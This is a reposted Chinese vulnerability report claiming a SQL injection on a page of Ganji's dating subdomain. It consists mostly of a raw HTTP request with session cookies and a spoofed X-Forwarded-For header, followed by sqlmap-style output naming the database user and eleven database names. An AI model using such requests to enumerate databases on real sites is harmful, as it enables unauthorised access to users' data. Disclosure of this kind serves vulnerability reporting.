当前位置: 移动技术网 > 网络运营>安全>网站安全 > 赶集网某处存在SQL注入漏洞

赶集网某处存在SQL注入漏洞

2018年01月13日  | 移动技术网网络运营  | 我要评论

rt

Host: jiaoyou.ganji.cn
 

GET /bj/user/show/?pid=3&source=2&nopid=1 HTTP/1.1
Referer: https://jiaoyou.ganji.cn/bj/user/show?pid=&source=2&nopid=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Host: jiaoyou.ganji.cn
Cookie: cityDomain=bj; GANJISESSID=d341ffd74d5b9c91e2b66dfa6caca2d7; jy_registered_userid_603032032=603032032; __utmganji_v20110909=0x643c9e5b55cc69322ee0c233e97e2ff; jy_registered_userid_185343891=185343891; jy_last_search_jsonstr=%7B%22sex%22%3A%22gg%22%2C%22age_start%22%3A%2260%22%2C%22age_end%22%3A%2260%22%2C%22city%22%3A%22bj%22%2C%22height_start%22%3A%22260%22%2C%22height_end%22%3A%22260%22%2C%22house%22%3A%223%22%2C%22education%22%3A%225%22%2C%22salary%22%3A%2270%22%2C%22online%22%3Anull%7D
Accept-Encoding: gzip, deflate




current user:    '[email protected]%.%.%'

available databases [11]:
[*] cdc
[*] information_schema
[*] jiaoyou
[*] jiaoyou_app
[*] jiaoyou_business
[*] jiaoyou_circle
[*] jiaoyou_gift
[*] jiaoyou_message
[*] jiboyou_mood
[*] mysql
,,,,

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网